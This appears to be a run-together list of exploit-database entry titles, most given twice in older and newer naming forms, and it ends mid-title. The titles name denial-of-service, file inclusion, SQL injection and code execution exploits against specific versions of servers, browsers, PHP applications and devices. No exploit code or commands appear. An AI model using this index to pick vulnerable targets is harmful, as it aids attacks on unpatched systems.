(ftruncate) Local Denial of Service Exploit FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service Exploit FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service phpBB News Defilante Horizontale 4.1.1 - Remote Include Exploit phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion Exploit NuralStorm Webmail 0.98b (process.php) Remote Include NuralStorm Webmail 0.98b (process.php) Remote File Inclusion DigitalHive 2.0 RC2 - (base_include.php) Remote Include DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion Xfire 1.6.4 - Remote Denial of Service Exploit (Perl) Osprey 1.0 GetRecord.php Remote File Inclusion Xfire 1.6.4 - Remote Denial of Service (Perl) Osprey 1.0 - GetRecord.php Remote File Inclusion MambWeather Mambo Module 1.8.1 - Remote Include MambWeather Mambo Module 1.8.1 - Remote File Inclusion QK SMTP 3.01 - (RCPT TO) Remote Denial of Service Exploit QK SMTP 3.01 - (RCPT TO) Remote Denial of Service FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service Exploit FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service Exploit RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service PHPMyDesk 1.0beta (viewticket.php) Local File Inclusion Exploit PHPMyDesk 1.0 beta - (viewticket.php) Local File Inclusion Exploit Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote Denial of Service Microsoft Windows NAT Helper Components Remote DoS Exploit (perl) Microsoft Windows NAT Helper Components Remote Denial of Service (perl) GEPI 1.4.0 gestion/savebackup.php Remote File Inclusion GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote DoS Exploit Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service Exploit Essentia Web Server 2.15 - (GET Request) Remote DoS Exploit XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service Essentia Web Server 2.15 - (GET Request) Remote Denial of Service OpenLDAP 2.2.29 - Remote Denial of Service Exploit (Metasploit) OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit) WarFTPd 1.82.00-RC11 - Remote Denial of Service Exploit WarFTPd 1.82.00-RC11 - Remote Denial of Service WORK System E-Commerce 3.0.1 - Remote Include WORK System E-Commerce 3.0.1 - Remote File Inclusion CMSmelborp Beta (user_standard.php) Remote File Inclusion Exploit CMSmelborp Beta - (user_standard.php) Remote File Inclusion Exploit phpPeanuts 1.3 Beta (Inspect.php) Remote File Inclusion phpPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion UniversalFTP 1.0.50 - (MKD) Remote Denial of Service Exploit UniversalFTP 1.0.50 - (MKD) Remote Denial of Service Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0Day) Microsoft Windows spoolss GetPrinterData() Remote Denial of Service (0Day) awrate.com Message Board 1.0 - (search.php) Remote Include awrate.com Message Board 1.0 - (search.php) Remote File Inclusion F-Prot Antivirus 4.6.6 - (ACE) Denial of Service Exploit F-Prot Antivirus 4.6.6 - (ACE) Denial of Service Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Filezilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service Exploit D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service Exploit Filezilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service Exploit Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service Exploit Windows Media Player 9/10 - (.MID) Denial of Service Exploit Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service Windows Media Player 9/10 - (.MID) Denial of Service Star FTP Server 1.10 - (RETR) Remote Denial of Service Exploit Star FTP Server 1.10 - (RETR) Remote Denial of Service Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service Exploit Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service WinFtp Server 2.0.2 - (PASV) Remote Denial of Service Exploit WinFtp Server 2.0.2 - (PASV) Remote Denial of Service RealPlayer 10.5 - (ActiveX Control) Denial of Service Exploit RealPlayer 10.5 - (ActiveX Control) Denial of Service DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service Exploit DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service inertianews 0.02b (inertianews_main.php) Remote Include inertianews 0.02b (inertianews_main.php) Remote File Inclusion XM Easy Personal FTP Server 5.2.1 - (USER) Format String DoS Exploit XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service Exploit acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service Microsoft Windows NetrWkstaUserEnum() Remote DoS Exploit (0Day) Microsoft Windows NetrWkstaUserEnum() Remote Denial of Service (0Day) RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Exploit RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Durian Web Application Server 3.02 - Denial of Service Exploit Durian Web Application Server 3.02 - Denial of Service Formbankserver 1.9 - (Name) Remote Denial of Service Exploit Formbankserver 1.9 - (Name) Remote Denial of Service Microsoft Windows - Explorer (WMF) CreateBrushIndirect DoS Exploit Microsoft Windows - Explorer (WMF) CreateBrushIndirect Denial of Service VLC Media Player 0.8.6a Unspecified Denial of Service Exploit VLC Media Player 0.8.6a Unspecified Denial of Service WFTPD Pro Server 3.25 SITE ADMN Remote Denial of Service Exploit WFTPD Pro Server 3.25 SITE ADMN Remote Denial of Service Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service Exploit Colloquy 2.1.3545 - (INVITE) Format String Denial of Service Exploit Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service Colloquy 2.1.3545 - (INVITE) Format String Denial of Service CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Exploit CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) DoS Exploit Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service Microsoft Windows - Explorer (AVI) Unspecified Denial of Service Exploit Microsoft Windows - Explorer (AVI) Unspecified Denial of Service Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby) Apple CFNetwork - HTTP Response Denial of Service (Ruby) CVSTrac 2.0.0 - Post-Attack Database Resurrection DoS Exploit CVSTrac 2.0.0 - Post-Attack Database Resurrection Denial of Service Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Exploit phpBB2 MODificat 0.2.0 - (functions.php) Remote Include Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service phpBB2 MODificat 0.2.0 - (functions.php) Remote File Inclusion CA BrightStor ARCserve 11.5.2.0 - (catirpc.dll) RPC Server DoS Exploit CA BrightStor ARCserve 11.5.2.0 - (catirpc.dll) RPC Server Denial of Service Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service Exploit Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit SmartFTP Client 2.0.1002 - Remote Heap Overflow DoS Exploit FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service Axigen 2.0.0b1 - Remote Denial of Service Exploit Axigen 2.0.0b1 - Remote Denial of Service Exploit (2) Axigen 2.0.0b1 - Remote Denial of Service Axigen 2.0.0b1 - Remote Denial of Service (2) phpCC 4.2 beta (nickpage.php npid) SQL Injection Exploit phpCC 4.2 beta - (nickpage.php npid) SQL Injection Exploit MiniWebsvr 0.0.6 - Remote Resource Consumption DoS Exploit MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service MailEnable Professional/Enterprise 2.35 Out of Bounds DoS Exploit MailEnable Professional/Enterprise 2.35 Out of Bounds Denial of Service MailEnable Professional/Enterprise 2.37 - Denial of Service Exploit MailEnable Professional/Enterprise 2.37 - Denial of Service TurboFTP 5.30 Build 572 - (newline/LIST) Multiple Remote DoS Exploit TurboFTP 5.30 Build 572 - (newline/LIST) Multiple Remote Denial of Service PHP-Nuke 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql) PHP-Nuke 8.0 Final (INSERT) SQL Injection Exploit PHP-Nuke 8.0 Final (HTTP Referers) SQL Injection Exploit FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit PHP-Nuke 8.0 Final - (INSERT) Blind SQL Injection Exploit (mysql) PHP-Nuke 8.0 Final - (INSERT) SQL Injection Exploit PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection Exploit FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote Denial of Service BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit BrowseDialog Class - (ccrpbds6.dll) Multiple Methods Denial of Service Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service XM Easy Personal FTP Server 5.30 - (ABOR) Format String DoS Exploit XM Easy Personal FTP Server 5.30 - (ABOR) Format String Denial of Service DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service Exploit DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service Asterisk 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit Asterisk 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) Denial of Service Microsoft Windows - (.doc) Malformed Pointers Denial of Service Exploit Microsoft Windows - (.doc) Malformed Pointers Denial of Service TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit Rediff Toolbar ActiveX Control Remote Denial of Service Exploit Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote DoS Exploit TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Rediff Toolbar ActiveX Control Remote Denial of Service Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote Denial of Service Microsoft Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016) Microsoft Internet Explorer - (FTP Server Response) Denial of Service (MS07-016) TFTP Server 1.3 - Remote Buffer Overflow Denial of Service Exploit TFTP Server 1.3 - Remote Buffer Overflow Denial of Service MetaForum 0.513 Beta Remote File Upload Exploit MetaForum 0.513 Beta - Remote File Upload Exploit Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32) Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Mercur IMAPD 5.00.14 - Remote Denial of Service (Win32) Grandstream Budge Tone-200 IP Phone (Digest domain) DoS Exploit Grandstream Budge Tone-200 IP Phone (Digest domain) Denial of Service 0irc-client 1345 build20060823 - Denial of Service Exploit 0irc-client 1345 build20060823 - Denial of Service Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit sBLOG 0.7.3 Beta - (inc/lang.php) Local File Inclusion Exploit IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service Exploit Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Gran Paradiso 3.0a3 non-existent applet Denial of Service Exploit Gran Paradiso 3.0a3 non-existent applet Denial of Service Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit Sami HTTP Server 2.0.1 POST Request Denial of Service Ettercap-NG 0.7.3 - Remote Denial of Service Exploit Ettercap-NG 0.7.3 - Remote Denial of Service Mozzers SubSystem final (subs.php) Remote Code Execution Mozzers SubSystem final - (subs.php) Remote Code Execution Winamp 5.3 - (.WMV) Remote Denial of Service Exploit Winamp 5.3 - (.WMV) Remote Denial of Service Foxit Reader 2.0 - (PDF) Remote Denial of Service Exploit Foxit Reader 2.0 - (PDF) Remote Denial of Service Joomla 1.5.0 Beta (pcltar.php) Remote File Inclusion Winamp 5.33 - (.AVI) Remote Denial of Service Exploit Joomla 1.5.0 Beta - (pcltar.php) Remote File Inclusion Winamp 5.33 - (.AVI) Remote Denial of Service Opera 9.2 - (.torrent) Remote Denial of Service Exploit Opera 9.2 - (.torrent) Remote Denial of Service Linksys SPA941 \377 character Remote Denial of Service Exploit Linksys SPA941 - (remote reboot) Remote Denial of Service Exploit Linksys SPA941 \377 character Remote Denial of Service Linksys SPA941 - (remote reboot) Remote Denial of Service RealPlayer 10 - (.ra) Remote Denial of Service Exploit RealPlayer 10 - (.ra) Remote Denial of Service PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service Exploit PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Word Viewer OCX 3.2 - Remote Denial of Service Exploit Word Viewer OCX 3.2 - Remote Denial of Service Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service Exploit Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote DoS Exploit Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote Denial of Service Opera 9.10 alert() Remote Denial of Service Exploit Opera 9.10 alert() Remote Denial of Service SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service Exploit SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service SimpleNews 1.0.0 FINAL (print.php news_id) SQL Injection Exploit SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection Exploit Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service PrecisionID Barcode ActiveX 1.3 - Denial of Service Exploit PrecisionID Barcode ActiveX 1.3 - Denial of Service ID Automation Linear Barcode ActiveX Denial of Service Exploit ID Automation Linear Barcode ActiveX Denial of Service Microsoft Windows Vista - Forged ARP packet Network Stack DoS Exploit Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service BitsCast 0.13.0 - (invalid string) Remote Denial of Service Exploit NewzCrawler 1.8 - (invalid string) Remote Denial of Service Exploit BitsCast 0.13.0 - (invalid string) Remote Denial of Service NewzCrawler 1.8 - (invalid string) Remote Denial of Service PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service Exploit PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service Exploit CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Mambo com_yanc 1.4 beta (id) SQL Injection Mambo com_yanc 1.4 beta - (id) SQL Injection Microsoft IIS 6.0 - (/AUX/.aspx) Remote Denial of Service Exploit Microsoft IIS 6.0 - (/AUX/.aspx) Remote Denial of Service LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote DoS Exploit LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service EDraw Office Viewer Component Denial of Service Exploit EDraw Office Viewer Component Denial of Service SNMPc 7.0.18 - Remote Denial of Service Exploit (Metasploit) SNMPc 7.0.18 - Remote Denial of Service (Metasploit) Microsoft Windows GDI+ - ICO File Remote Denial of Service Exploit Microsoft Windows GDI+ - ICO File Remote Denial of Service MiniWeb Http Server 0.8.x - Remote Denial of Service Exploit MiniWeb Http Server 0.8.x - Remote Denial of Service Safari 3 for Windows Beta Remote Command Execution PoC Safari 3 for Windows Beta - Remote Command Execution PoC BitchX 1.1-final (EXEC) Remote Command Execution Exploit BitchX 1.1-final - (EXEC) Remote Command Execution Exploit PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service Exploit PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service PHP 5.2.3 - glob() Denial of Service Exploit PHP 5.2.3 - glob() Denial of Service TeamSpeak 2.0 - (Windows Release) Remote Denial of Service Exploit TeamSpeak 2.0 - (Windows Release) Remote Denial of Service Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit Microsoft Windows - Explorer.exe Gif Image Denial of Service Xserver 0.1 Alpha - Post Request Remote Buffer Overflow Exploit Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit Microsoft Internet Explorer 6 DirectX Media Remote Overflow Denial of Service Cisco IOS Next Hop Resolution Protocol (NHRP) Denial of Service Exploit Cisco IOS Next Hop Resolution Protocol (NHRP) Denial of Service WengoPhone 2.x - SIP Phone Remote Denial of Service Exploit WengoPhone 2.x - SIP Phone Remote Denial of Service CounterPath X-Lite 3.x - SIP phone Remote Denial of Service Exploit CounterPath X-Lite 3.x - SIP phone Remote Denial of Service WireShark < 0.99.6 Mms Remote Denial of Service Exploit Easy Chat Server 2.2 - Remote Denial of Service Exploit WireShark < 0.99.6 Mms Remote Denial of Service Easy Chat Server 2.2 - Remote Denial of Service Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service Exploit Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service Exploit eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BoF Exploit Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote BoF Exploit Thomson SIP phone ST 2030 - Remote Denial of Service Exploit Thomson SIP phone ST 2030 - Remote Denial of Service Microsoft Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046) Microsoft Windows - (GDI32.DLL) Denial of Service (MS07-046) JetCast Server 2.0.0.4308 - Remote Denial of Service Exploit JetCast Server 2.0.0.4308 - Remote Denial of Service actSite 1.991 Beta (base.php) Remote File Inclusion actSite 1.991 Beta - (base.php) Remote File Inclusion wzdftpd 0.8.0 - (USER) Remote Denial of Service Exploit wzdftpd 0.8.0 - (USER) Remote Denial of Service LiveAlbum 0.9.0 common.php Remote File Inclusion LiveAlbum 0.9.0 - common.php Remote File Inclusion eXtremail 2.1.1 memmove() Remote Denial of Service Exploit eXtremail 2.1.1 memmove() Remote Denial of Service GCALDaemon 1.0-beta13 - Remote Denial of Service Exploit GCALDaemon 1.0-beta13 - Remote Denial of Service Mozilla Firefox 2.0.0.7 - Remote Denial of Service Exploit Mozilla Firefox 2.0.0.7 - Remote Denial of Service Firefly Media Server 0.2.4 - Remote Denial of Service Exploit Ubuntu 6.06 DHCPd - Remote Denial of Service Exploit Firefly Media Server 0.2.4 - Remote Denial of Service Ubuntu 6.06 DHCPd - Remote Denial of Service patBBcode 1.0 bbcodeSource.php Remote File Inclusion patBBcode 1.0 - bbcodeSource.php Remote File Inclusion RealPlayer 11 Malformed AU File Denial of Service Exploit RealPlayer 11 Malformed AU File Denial of Service Cisco Phone 7940 - Remote Denial of Service Exploit Cisco Phone 7940 - Remote Denial of Service Simple HTTPD 1.41 - (/aux) Remote Denial of Service Exploit Simple HTTPD 1.41 - (/aux) Remote Denial of Service SurgeMail 38k4 - webmail Host header Denial of Service Exploit SurgeMail 38k4 - webmail Host header Denial of Service Blakord Portal Beta 1.3.A (all modules) SQL Injection Blakord Portal Beta 1.3.A - (all modules) SQL Injection WebPortal CMS 0.6-beta Remote Password Change Exploit WebPortal CMS 0.6-beta - Remote Password Change Exploit Half-Life CSTRIKE Server 1.6 - Denial of Service Exploit (no-steam) Half-Life CSTRIKE Server 1.6 - Denial of Service (no-steam) Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote DoS Exploit Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service PHP-Nuke 8.0 Final (sid) SQL Injection Exploit PHP-Nuke 8.0 Final - (sid) SQL Injection Exploit Apple iPhone 1.1.2 - Remote Denial of Service Exploit Apple iPhone 1.1.2 - Remote Denial of Service MicroTik RouterOS 3.2 SNMPd snmp-set Denial of Service Exploit MicroTik RouterOS 3.2 SNMPd snmp-set Denial of Service Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Joomla Component MCQuiz 0.9 Final - (tid) SQL Injection Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit Apple iPhoto 4.0.3 DPAP Server Denial of Service MyServer 0.8.11 - (204 No Content) error Remote Denial of Service Exploit MyServer 0.8.11 - (204 No Content) error Remote Denial of Service Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) DoS Exploit Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service ICQ Toolbar 2.3 - ActiveX Remote Denial of Service Exploit ICQ Toolbar 2.3 - ActiveX Remote Denial of Service Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win) Apple Safari (webkit) Remote Denial of Service (iphone/osx/win) Home FTP Server 1.4.5 - Remote Denial of Service Exploit Home FTP Server 1.4.5 - Remote Denial of Service PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion Exploit Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Exploit Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Noticeware Email Server 4.6.1.0 - Denial of Service Exploit Noticeware Email Server 4.6.1.0 - Denial of Service Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit Novel eDirectory HTTP - Denial of Service Exploit Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Novel eDirectory HTTP - Denial of Service XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service Exploit XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service e-107 Plugin zogo-shop 1.16 Beta 13 SQL Injection e-107 Plugin zogo-shop 1.16 Beta 13 - SQL Injection AlkalinePHP 0.80.00 beta (thread.php id) SQL Injection Exploit AlkalinePHP 0.80.00 beta - (thread.php id) SQL Injection Exploit Mambo Component mambads 1.0 RC1 Beta SQL Injection Mambo Component mambads 1.0 RC1 Beta - SQL Injection I-Pos Internet Pay Online Store 1.3 Beta SQL Injection I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection P2P Foxy Out of Memory Denial of Service Exploit P2P Foxy Out of Memory Denial of Service uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service Simple DNS Plus 5.0/4.1 - Remote Denial of Service Exploit Simple DNS Plus 5.0/4.1 - Remote Denial of Service Yahoo Messenger 8.1 - ActiveX Remote Denial of Service Exploit Yahoo Messenger 8.1 - ActiveX Remote Denial of Service WinRemotePC Full+Lite 2008 r.2server Denial of Service Exploit WinRemotePC Full+Lite 2008 r.2server Denial of Service Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit Bea Weblogic Apache Connector - Code Execution / Denial of Service Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit Oracle Internet Directory 10.1.4 - Remote Preauth Denial of Service F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop DoS Exploit F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service Xerox Phaser 8400 - (reboot) Remote Denial of Service Exploit Xerox Phaser 8400 - (reboot) Remote Denial of Service HydraIrc 0.3.164 - (last) Remote Denial of Service Exploit HydraIrc 0.3.164 - (last) Remote Denial of Service txtSQL 2.2 Final (startup.php) Remote File Inclusion txtSQL 2.2 Final - (startup.php) Remote File Inclusion Ventrilo 3.0.2 - NULL pointer Remote DoS Exploit Ventrilo 3.0.2 - NULL pointer Remote Denial of Service Google Chrome Browser 0.2.149.27 A HREF Denial of Service Exploit Google Chrome Browser 0.2.149.27 A HREF Denial of Service Google Chrome Browser 0.2.149.27 Inspect Element DoS Exploit Google Chrome Browser 0.2.149.27 Inspect Element Denial of Service Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service Exploit Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service Adobe Acrobat 9 - ActiveX Remote Denial of Service Exploit Adobe Acrobat 9 - ActiveX Remote Denial of Service The Personal FTP Server 6.0f RETR Denial of Service Exploit The Personal FTP Server 6.0f RETR Denial of Service Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - (.forward) Local DoS Exploit Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - (.forward) Local Denial of Service WonderWare SuiteLink 2.0 - Remote Denial of Service Exploit (Metasploit) WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit) Femitter FTP Server 1.03 - (RETR) Remote Denial of Service Exploit PoC Femitter FTP Server 1.03 - (RETR) Remote Denial of Service PoC fhttpd 0.4.2 un64() - Remote Denial of Service Exploit fhttpd 0.4.2 un64() - Remote Denial of Service DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service Exploit DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service Vikingboard 0.2 Beta (task) Local File Inclusion Vikingboard 0.2 Beta - (task) Local File Inclusion Vikingboard 0.2 Beta SQL Column Truncation Vikingboard 0.2 Beta - SQL Column Truncation WinFTP Server 2.3.0 - (NLST) Denial of Service Exploit WinFTP Server 2.3.0 - (NLST) Denial of Service Chilkat IMAP ActiveX 7.9 - File Execution / IE DoS Exploit Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service Google Chrome 0.2.149.30 Window Object Suppressing DoS Exploit Google Chrome 0.2.149.30 Window Object Suppressing Denial of Service Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit Microsoft Windows Explorer - (.zip) Denial of Service Exploit Opera 9.52 Window Object Suppressing Remote Denial of Service Microsoft Windows Explorer - (.zip) Denial of Service Autodesk DWF Viewer Control / LiveUpdate Module Remote Exploit Autodesk DWF Viewer Control / LiveUpdate Module - Remote Exploit VBA32 Personal Antivirus 3.12.8.x - (malformed archive) DoS Exploit VBA32 Personal Antivirus 3.12.8.x - (malformed archive) Denial of Service Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Skype extension for Firefox BETA 2.2.0.95 - Clipboard Writing WinFTP 2.3.0 - (PASV mode) Remote Denial of Service Exploit WinFTP 2.3.0 - (PASV mode) Remote Denial of Service NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Auth DoS Exploit NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Auth Denial of Service GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit RaidenFTPD 2.4 build 3620 - Remote Denial of Service Exploit XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service RaidenFTPD 2.4 build 3620 - Remote Denial of Service Titan FTP server 6.26 build 630 - Remote Denial of Service Exploit Titan FTP server 6.26 build 630 - Remote Denial of Service Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS Exploit Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote Denial of Service Dart Communications PowerTCP FTP module Remote BoF Exploit Dart Communications PowerTCP FTP module - Remote BoF Exploit SilverSHielD 1.0.2.34 - (opendir) Denial of Service Exploit SilverSHielD 1.0.2.34 - (opendir) Denial of Service vicFTP 5.0 - (LIST) Remote Denial of Service Exploit vicFTP 5.0 - (LIST) Remote Denial of Service PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (Metasploit) PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit) PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Exploit PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Bloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling ExoPHPDesk 1.2 Final (Auth Bypass) SQL Injection ExoPHPDesk 1.2 Final - (Auth Bypass) SQL Injection Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service Exploit Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password Exploit Microsoft Office Communicator (SIP) Remote Denial of Service Exploit Microsoft Office Communicator (SIP) Remote Denial of Service OpenForum 0.66 Beta Remote Reset 